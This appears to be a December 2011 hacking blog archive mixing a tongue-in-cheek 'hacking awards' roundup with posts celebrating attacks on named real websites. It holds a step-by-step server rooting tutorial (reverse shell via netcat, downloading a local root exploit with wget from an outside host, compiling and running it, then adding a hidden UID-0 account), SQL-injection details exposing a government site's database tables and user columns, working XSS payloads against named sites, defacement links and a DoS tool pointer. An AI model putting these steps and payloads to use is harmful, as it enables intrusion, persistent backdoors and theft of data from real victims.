Saturday, December 31, 2011

Hacking Awards : Best of Year 2011


2011 has been labeled the "Year of the Hack” or “Epic #Fail 2011”. Hacking has become much easier over the years, which is why 2011 had a lot of hacking for good and for bad. Hackers are coming up with tools as well as finding new methods for hacking faster then companies can increase their security.  Every year there are always forward advancements in the tools and programs that can be used by the hackers.

At the end of year 2011 we decided to give "The Hacker News Awards 2011". The Hacker News Awards will be an annual awards ceremony celebrating the achievements and failures of security researchers and the Hacking community. The THN Award is judged by a panel of respected security researchers and Editors at The Hacker News.


Year 2011 came to an end following Operation Payback and Antisec, which targeted companies refusing to accept payments to WikiLeak's, such as, Visa and Amazon. Those attacks were carried out by Anonymous & Lulzsec. This year corporations, international agencies, and governments are now experiencing a flood of what is called Advanced Persistent Threats. APTs refer to a group of well-funded, highly capable hackers pursuing a specific agenda, often organized by a nation or State. Sony somehow pissed off the hacking group LulzSec, which downloaded information for millions of users, while posting to Sony's system: "LulzSec was here you sexy bastards! Stupid Sony, so very stupid."

The Hacker News Awards Categories & Winners
1.) Person of the Year : Julian Paul Assange


He is, of course, the lean, tall, and pale 39-year-old Australian master hacker at the white-hot center of the whistle-blowing website WikiLeaks and, after revealing thousands of secret Afghan battlefield reports this week, the subject of investigation by U.S. authorities. 2011 could also be called the “Age of WikiLeaks”. Assange described himself in a private conversation as "the heart and soul of this organisation, its founder, philosopher, spokesperson, original coder, organizer, financier, and all the rest". Wikileaks celebrate its 5th Birthday on 4th October 2011, for being only 5 years old they have done a remarkable and outstanding job of serving the people. The one thing most governments in the world have left off their agenda’s. Keep up the good work Wikileaks and we stand in support and behind you.

2.) Best Hacking Group of the Year 2011 : ANONYMOUS


DECK THE HALLS AND BATTON DOWN THE SECURITY SYSTEMS…..THEY AIN’T GOIN AWAY!
Anonymous hackers have gained world wide attention because of their hacktivism. Anonymous is not an organization. Anonymous has no leaders, no gurus, no ideologists. Anonymous has performed many operations like Attack on HBGary Federal, 2011 Bank of America document release, Operation Sony, Operation Anti-Security and lots more. Complete Coverage on all Anonymous related news is here.

3.) Best Whitehat hacker of the Year 2011 : CHARLIE MILLER


CHARLIE SHOWS TUNA ISN’T THE ONLY THING TO PROFIT FROM!
Charlie Miller is a former hacker who has become an information security consultant now working with the Department of Defense (DOD) and helping out with cyber security. He spent five years working for the National Security Agency. Miller demonstrated his hacks publicly on products manufactured by Apple. In 2008 he won a $10,000 cash prize at the hacker conference Pwn2Own in Vancouver Canada for being the first to find a critical bug in the ultrathin MacBook Air. The next year, he won $5,000 for cracking Safari. In 2009 he also demonstrated an SMS processing vulnerability that allowed for complete compromise of the Apple iPhone and denial-of-service attacks on other phones. In 2011 he found a security hole in an iPhone's or iPad's security. Charlie Miller gets a kick of out defeating Apple’s security mechanisms, using his hacking skills to break into Macbooks and iPhones.

4.) Best Leak of the year 2011 : HBGARY FEDERAL EMAILS LEAKED BY ANONYMOUS



GEE GREG, YOU THOUGHT WE JUST PLAYED WITH MATEL COMPUTERS!  NOT!!!!!
HBGary Federal who was helping the federal government track down cyber activists was itself hacked by the very same activists!  Gotta love these guys.  Through an elegant but by the numbers social engineering effort those fun fellas at Anonymous,  hacked and publicly shamed poor little HBGary Federal. Massive reputation damage and tons of turn-over in executive leadership resulted. Anonymous released 27,000 emails from the server of Greg Hoglund, chief executive of the software security firm HBGary. They posted 50,000 emails of Aaron Barr from the CEO of its sister organization, HBGary Federal. They obtained the emails by hacking into Hoglund’s email.

5.) Best Defacement of the Year
 2011 : DNS HIJACKING OF HIGH PROFILE SITES BY TURKGUVENLIGI


TURKGUVENLIGI……..THE GIFT THAT KEEPS ON GIVING!!
Turkguvenligi also known by the name "TG Hacker' hacked some very high profile sites using DNS Hijacking.  Sites included, Theregister.co.uk , Vodafone, Telegraph, Acer, National Geographic. He diverted visitors to a page declaring it was “World Hackers Day”. TurkGuvenligi has claimed credit for dozens of similar defacement attacks since late 2008.

6.) Craziest Hack of the year: INMOTION HOSTING (Over 700,000 Websites Hacked)

BEWARE OF TIGER’S IN MOTION…….COMING TO YOUR WEBSITE SOON!
InMotion's data center got hit by the hacker that calls himself TiGER-M@TE, leaving a few hundred thousand website owners with nonfunctional pages and 700,000 web Pages defaced . He is also the one responsible for the attack carried out on Google Bangladesh.  In our humble opinion, this is the craziest hack of the year.

7.) Malware of Year 2011 : DuQu

ALAH CAN’T HELP IRAN…….NOT WITH DuQu ON THE LOOSE!
This year was really hot on malware discovery and analysis. DuQu  became the first known network modular rootkit.   DuQu has flexibility for hackers to help remove and add new features quickly and without special effort. Some experts have doubts on relation between the Stuxnet and DuQu creators as they both aim for stealing and collecting data related to Iranian agencies activities.

8.) Best Hacking Tool of the Year 2011 - ANTI (Android Network Toolkit)


HEY CYBER WORLD, STICK THIS IN YOUR TOOL BELT!
ANTI is the smallest but most powerful hacking tool developed by the company Zimperium. Anti-Android Network Toolkit is an app that uses WiFi scanning tools to scan networks. You can scan a network that you have the phone connected to or you can scan any other nearby open networks. Security admins can use Anti to test network host vulnerabilities for DoS attacks and other threats. Features : OS detection, traceroute, port connect, Wi-Fi monitor, HTTP server, man-in-the-middle threats, remote exploits, Password Cracker and DoS attack and plugins.

9.) High Profile Hacker of the Year 2011 : LULZSEC

LULZSEC KEEPS US LAUGHING ALL THROUGH 2011!
Lulz Security, commonly abbreviated as LulzSec, is a computer hacker group that claims responsibility for several high profile attacks, including the compromise of user accounts from Sony Pictures in 2011. The group also claimed responsibility for taking the CIA website offline. It has gained attention due to its high profile targets and the sarcastic messages it has posted in the aftermath of its attacks. The group's first recorded attack was against Fox.com's website. LulzSec does not appear to hack for financial profit. The group's claimed main motivation is to have fun by causing mayhem. They do things "for the lulz" and focus on the possible comedic and entertainment value of attacking targets.

10.) Biggest Victim of the Year 2011 : SONY

SONY SHINES AS THE BIGGEST VICTIM OF ALL!
Sony gets the Most Epic fail award so we want to give the Best Victim of the year award to Sony. Almost all Sony’s websites including Indonesia, Japan, Thailand, Greece, Canada, Netherlands, Europe, Russia, Portugal & Sony PlayStation Network were Hacked. Defacement of various domains of Sony and Personal information of 77 million people, including customer names, addresses, e-mail addresses, birthdays, PlayStation Network and Qriocity passwords, user names, online handles and possibly credit cards were exposed. Sony expects the hack of the PlayStation Network and cost at ¥14 billion (US$170 million) .


11.) Most Spamy Social Network : FACEBOOK
FACEBOOK OUTTA FACE IT……..IT’S A RIPE TARGET FOR 2012
Social network sites such as Facebook, Google+ or Twitter are gaining popularity. But the 'Web 2.0' presents new dangers. The wave of pornographic and violent images, Spam messages, Virus and various Worms that flooded Facebook over the past year, make it the Most Spamy Social Network of the Year. Social media is the new frontier for all of this spam. The attack tricked users into clicking on a story they thought would bring them a related video or picture. Instead, Facebook members were taken to websites that attacked their browsers with malicious software and posted violent and disturbing images to their news feeds. 

Friday, December 30, 2011

www.orinfor.gov.rw hacked by x________X

www.orinfor.gov.rw hacked by "x________X " he found it a sql injection vulnerability on orinfor website
DEFACE PAGE:
http://www.orinfor.gov.rw/x________X.html

Vulnerable URL:
Code:
http://www.orinfor.gov.rw/jobdetails.php?jid=3



Number of Columns:
Code:
5


Version:
Code:
5.0.51a-3ubuntu5.5


Databases:
Code:
information_schema,mysql,orinfordb


Tables from current DB:
Code:
orinfor_adverts,orinfor_audiofiles,orinfor_comments,orinfor_communityradios,orin​for_config,orinfor_downloads,orinfor_forex,orinfor_news,orinfor_newscategories,o​rinfor_othercontent,orinfor_pollanswers,orinfor_polls,orinfor_pollvotes,orinfor_​profiles,orinfor_radiomessages,orinfor_radiopresenters,orinfor_radioprogrammes,o​rinfor_regionalcenters,orinfor_search,orinfor_settings,orinfor_sitesections,orin​for_subscriptions,orinfor_tvprogrammes,orinfor_tvstaff,orinfor_userpermissions,o​rinfor_users,orinfor_vacancies,orinfor_videos,orinfor_volumes


Columns from 'orinfor_users':
Code:
Date of Announcement: userid,username,password,isadmin,fullname


Wednesday, December 28, 2011

www.newvision.co.ug Hacked by Rwandan Hackers

www.newvision.co.ug was Hacked by Rwandan hackers.They hacked into the database of the website and exposed sensitive information like admin details and many more.
 Database info :


Friday, December 23, 2011

www.sevenseasmusic.fr Hacked by Rwandan hackers

www.sevenseasmusic.fr
Rwandan Hackers found SQL-i vulnerability on www.sevenseasmusic.fr. According to him there are non-persistence XSS vulnerability and also SQL-i vulnerability.
Using the vulnerability an attacker can exploit the entire database and gain illegal access
Vulnerable Website
ADMIN INFO :


I apologize for people who want to download his mixtape


Microsoft Introduced Picture Passwords For Windows 8

 

The experience of signing in to your PC with touch has traditionally been a cumbersome one. In a world with increasingly strict password requirements—with numbers, symbols, and capitalization—it can take upwards of 30 seconds to enter a long, complex password on a touch keyboard. To get rid of all these stuffs Microsoft is introducing a new technology. Using that you can login ti your Windows 8 PC with a picture password. Likely designed for touchscreens, users are prompted with a familiar picture of their choice and asked to make a series of finger gestures on the screen to setup password protection. Microsoft recommends that users pick at least three gestures and can choose between a circle, a tap and a line drawn between two points. When a user logs into a Windows 8 machine using Picture Password, they simply have to replicate the correct placement, order and direction of all gestures.

Microsoft dictates the set of three different gestures after research showed that login time was cut from 17 seconds using free form gestures to 4 seconds using preset gestures. Users don’t have to be 100 percent accurate with the placement of the gestures as the image is broken up into a grid and the combination of replicating the three gestures is assigned a percentage score each time the login process is attempted through an algorithm. If the score is 90 percent or above, the user gains access to the system. Microsoft also outlined how security is increased with the Picture Password method. For instance, if a user creates a six-character text password with at least one uppercase letter and one number, there would be 7 billion combinations available. However, if a user creates a picture password with six gestures using only taps, that number increases to 1.3 trillion combinations. Even further, reducing the amount of gestures to five and including at least one circle and one line gesture within the group increases the number of combinations to approximately 70 trillion. The Windows engineering team has just started building the Picture Password functionality and hopes to include it within the final version of Windows 8 likely released during 2012.
You can find more information about this article on the Windows 8 Developer Blog

Friday, December 16, 2011

Server Rooting Tutorial and Adding New Root User

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

welcome to a tutorial on how to root a linux server.
This is going to be short,HQ tutorial with pictures included (For better learining)


So let's start with things you will need:




  • 1) Shelled website
  • 2) Local root exploit
  • 3) NetCat



Chapter 1 - Gathering informations


Open up your .php shell on a hacked webserver.
I have mine for an example

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm



Now you need to check what kernel your slave is using...
It should be something like 


Linux somerandomhosting.com 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686


Next thing you wanna do is to look for an local root exploit.
From example provided mine one is 2.6.18-8.el5 #1 SMP Fri Jan 26 14:15:21 EST 2007 i686.


Here's the list of exploits
http://pastebin.com/A0sUhhrz

NOTE: If your webserver have 2.6.18 2011 kernel,then you have 0.0001% chances that you will root it,because there's no public exploit for that version.


Chapter 2 - Backconnecting to the server
For this you will need:


1) NetCat
2) Open port (Example. 443 I won't teach how to port forward,use Google if you don't know how!!)


So open your netcat and type:
-l -n -v -p 443
Hit "Enter"


Now it should write "listening on [any] 443 ..."
Good.
Go back to your shell and go to "BackConnect function"
Many shells have it.
Enter your port and press "Connect".

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm


Now it should connect to your netcat 
I got something like this

DuDe Click on the image to see full Size Greetings ALBoRaaQ-TeAm

Chapter 3 - Downloading exploit and executing it
Now we will need our exploit from Chapter 1
There's 2 way of uploading:

1) Using shell uploader
2) Using 'wget' function (Requires backconnection)

I'm going to use 'wget' function because it's easier and faster.
So copy your exploit link (Mine one http://localroot.th3-0utl4ws.com/xploits...8-164.zip) and go back to your netcat and type:

Now it downloaded out exploit named "2.6.18-164.zip" on our server.

If your exploit is downloaded as anyrandomname.c you must compile it
Do do that first download that exploit and then type:

gcc anyrandomname.c -o anyrandomname
And our exploit is compiled. (If you get errors when compiling then find another exploit)


If you downloaded your exploit in zip file anyrandomname.zip type:

unzip anyrandomname.zip


Now you should have your exploit (Like mine "2.6.18-164")

If you completed all steps it's time to get root.

Type:

chmod 777 yourexploit'sname
With common sense where i typed "yourexploit'sname" you will type your exploit's name.

And one last final step is to run our exploit
./yourexploit'sname


To check if you got root type

id
or
whoami

Mine steps to root


Chapter 4 - Adding root user
Adding new root user is fairly easy
We use this command:
adduser -u 0 -o -g 0 -G 0,1,2,3,4,6,10 -M root2

Command explanations:
Quote:adduser - Using Linux adduser command to create a new user account or to update default new user information.

-u 0 -o - Set the value of user id to 0.

-g 0 - Set the initial group number or name to 0

-G 0,1,2,3,4,6,10 - Set supplementary group to:
0 = root
1 = bin
2 = daemon
3 = sys
4 = adm
6 = disk
10 = wheel

-M - 'home directory' not created for the user.

root2 - User name of the new user account.NOTE: Change root2 to your desired username.

Now you need to set a password for your username.
Type in next:
passwd Root2

(Root2 is your username)

See an example

[root@fedora ~]# passwd root2
Changing password for user root2.
New UNIX password:
Retype new UNIX password:
passwd: all authentication tokens updated successfully.

To check if you did alright

id root2
(Root2 is your username)


GNY shell - http://privatepaste.com/1321f97984
Google - http://google.com
NetCat - http://downloadnetcat.com/nc11nt.zip

So that concluded our rooting tutorial.
I hope that someone will learn from this and that this thread will be bookmarked for generations

Friday, December 9, 2011

Newtimes Database Compromised

Rwandan Hackers found multiple vulnerability on new times.The database has been hacked and exposed by Rwandan hackers
on pastebin.

Database link:http://pastebin.com/8uqsc6FC

XSS Vulnerability in Google Code site

XSS (Cross site Scripting)Vulnerability discovered in Google Code website
Proof Of Concept: Just go to http://code.google.com/apis/ajax/playground/ and then click on edit HTML after that remove all the codes and type this script : <img src="<img src=search"/onerror=alert("XSS")//"> and click on DEBUG CODE, and then first it will show you "Sample must have <head> element" click OK and wait for the window to load if nothing happen then try the same thing again or simply you can click on RUN CODE, and you will get a popup which is XSS.

Another Similar XSS posted by +Pirate, as posted on HackForum Community.

4shared.com Is Vulnerable To XSS


Free online file sharing website 4shared.com is vulnerable, Rwandan Hackers found this non persistent XSS vulnerability.

To know the Vulnerable link submitted by the hacker click HERE

Monday, December 5, 2011

Babylon Search Engine Is XSS Vulnerable



XSS vulnerability on Babylon search engine. According to the hacker Babylon search engine is vulnerable to a particular type of XSS attack. It can be XSSed by first adding a normal string at the beginning and then pushing the script. Since the search engine has implemented XSS filtering so it can be bypassed by crafting a different vector like the one shown in the screenshot
LINK:
 http://search.babylon.com/?q=helloworld%3Cscript%3Ealert%28%27hacked+alert+by+Rwandan+Hackers%27%29%3B%3C%2Fscript%3Ehelloworld&s=web&as=0&babsrc=home

Sunday, December 4, 2011

Trustbank website Ghana hacked

Multiple sql injection found on www.trustbank.com.gh/ by Rwandan Hackers
Using the vulnerability an attacker can exploit the entire database and gain illegal access
Vulnerable Website

ADMIN INFO:

Saturday, December 3, 2011

20 WEBSITES DEFACED BY RWANDAN HACKERS

22 websites Defaced by Rwandan Hackers.They used sql injection and a new vulnerability called"Encodable"

Defaced Link:
http://www.colorslide.biz/upload/files/hacked/cyulox.html
http://outlawjeep.org/upload/files/cyulox.html
http://96.0.34.254/upload/files/HACKED/cyulox.html
http://www.oipaferrara.org/uploads/tetxt.txt
http://tahan.ismywebsite.com/phUploader/uploads/1322999595.txt
http://upload.paucina.com/slike/1322939016.txt
http://nicnick29.altervista.org/carica/caricati/1322933216.txt
http://www.shujaahmadshekh.com/upload/uploads/1322963291.txt
http://wgiupload.altervista.org/uploads/1322980884wgi.txt
http://portalsphere.free.fr/phUploader/uploads/1322976612.txt
http://www.up.kiousk.com/uploads/1323006593.txt
http://www.uka1.com/images/1322940967.txt
http://www.up.vahidweb.com/uploads/1322969017.txt
http://www.forumkirklareli.com/uploads/1322957114.txt
http://otupload.orangeoval.net/uploads/1322950627.txt
http://www.honesty.co/uploads/1323009960.txt
http://www.chiefehservers.com/upload/uploads/1323011390.txt
http://subland.info/upload/tetxt.txt
http://www.manx-bmd.co.uk/uploads/1322974291.txt
http://www.fidelityprintquick.com/uploads/tetxt.txt






www.premierleaguepool.co.uk Database Hacked

Premier League Fantasy Pool, one of the most popular soccer website of UK is under cyber attack. A hacker  has find SQL-i vulnerability on the official site of Free Premier League Soccer Pool & hacked into the database of that site and exposed 690+ user credentials including user-names, email-id, password and so on. Those hacked information are openly available on here

Thursday, December 1, 2011

smartrwanda.org under ddos attack


Hackers are using a new tool called Assassin DoS 2.0.3. This tool is based on a new attack that uses HTTP for flooding on the site down, it will work if you try a dedicated server key. Another feature of Assassin DoS is that it will not take all your resources such as DoS do. So it's like only 100 mili seconds of delay when you hit the target and its available for Windows


Its available to Download here